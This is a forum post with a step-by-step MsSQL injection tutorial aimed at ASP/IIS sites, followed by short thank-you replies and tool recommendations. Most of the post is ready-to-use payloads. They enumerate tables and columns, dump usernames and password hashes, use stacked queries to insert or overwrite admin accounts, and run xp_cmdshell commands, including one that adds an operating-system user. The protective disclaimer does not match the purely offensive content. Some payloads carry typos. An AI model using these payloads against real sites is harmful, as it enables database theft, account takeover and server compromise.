Tutorial Injection MsSQL - Complete
DISCLAIMER:THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSE FOR PROTECTING YOUR OWN CODE FROM SQL INJECTIONS. YOU WILL HAVE TO TAKE THE FULL RESPONSIBILITY FOR ANY ACTION U DO AFTER READING THIS TUTORIAL.
Background This article entitled "Complete MsSQL Injection For Newbies" intends to provide the complete knowledge and work-how of SQL injection specially targeted on MsSQL(ASP+IIS, because "it" occurs most frequently) database except the stacked query parts. First contribution over here... 0x00 The error output Will be used only to cover injection, building queries and stuff like that, will not be described. To begin, I want to see if we have found a bug, it does not necessarily mean that there is an injection. To check try to bring the version of MsSQL. Target: Code:
http://site.com/script.asp?id=5' Code:
Microsoft OLE DB Provider for SQL Server error '80040e14' Obtain Version: Code:
5' or 1=@@version-- Code:
Microsoft OLE DB Provider for SQL Server error '80040e07' Code:
id=5' or 1=(select db_name())-- Code:
id=5' or 1=(select system_user)-- => Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- Code:
Microsoft OLE DB Provider for SQL Server error '80040e07' The first method. Using the method of exclusion (with the names of the tables). Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table_name1','table_name4',table_name3','table_name4'))-- Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+4+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))-- Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>'table_name4')-- 0x02 Data output Suppose in the Users table is a column id (int), username (varchar), password (binary). In order to display different types of data, we will have to use the data type conversion (cast, convert, etc ..) We derive the first entry in the column id Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users)-- Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users+FOR+XML+PATH(''))-- Now let's take a cell from the column password, it seemed to be working well "cast (password + as + binary), but there are times when the FOR XML PATH, cast or convert does not give the desired result. Then you can search and other functions that are yet to nowhere not described. one of them. (".." - analog for access to the system table => 'dbo'). Code:
5'+or+1=(select+top+1+master..fn_varbintohexstr(password)+from+Users)--. Code:
5'+or+1=(SELECT+TOP+1+cast(id+as+nvarchar)%2B':'%2Bconvert(nvarchar,username)%2B':'%2Bmaster..fn_varbintohexstr(password)+FROM+Users)-- In response, we obtain: Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Code:
5'+or+1=(SELECT+TOP+1+quotename(id%2B':'%2Busername)+FROM+Users)-- Code:
5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115))-- There is another plus in MsSQL + IIS, is that very often we can "tear off" a request by the sign ";" and then create a new one. Everything is done in much the same. Code:
5';+INSERT+INTO+Users+(id,username,pass)+VALUE+(1,'admin','mypass')-- Code:
5';+UPDATE+Users+set+password='mypass'+where+username='admin'-- If you have enough rights, usually the user "sa" (root in mysql), you can try to do something of the following commands: How do I use ? Very simple, kill the request with a ";" and then create your request: Code:
5';exec master..xp_cmdshell 'dir c:\'-- Code:
5';exec master..xp_cmdshell 'net user admin password /add'-- Code:
5';exec master..xp_cmdshell [net user admin password /add]-- Theoretically, once drained the entire database via injection without the knowledge of database structure, it is impossible. But you can get information in the following ways. First, parse, 1 request - 1 record (later lay a parser). Second, the function to parse through the FOR XML RAW (it's ~ 2000 characters per request), the script will spread. Taken from pastebin.com Code:
<?php |
Old tutorial bro
but thank anyway for your post but i advice , if you use by hands , this method make you very tired So sometimes u should use tool like :Panlogin,Havij tool |
Я думаю, что Вы не правы. Я уверен. Давайте обсудим это. Пишите мне в PM, поговорим.
|
nice tutrial for newbe
|
thnxxxxx
|
thank's BRO nice tutrial for newbe
|
thanks for share
|
useful info
|
nice tut thanks alot
|
thank you
|
All times are GMT. The time now is 06:33 AM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
vB.Sponsors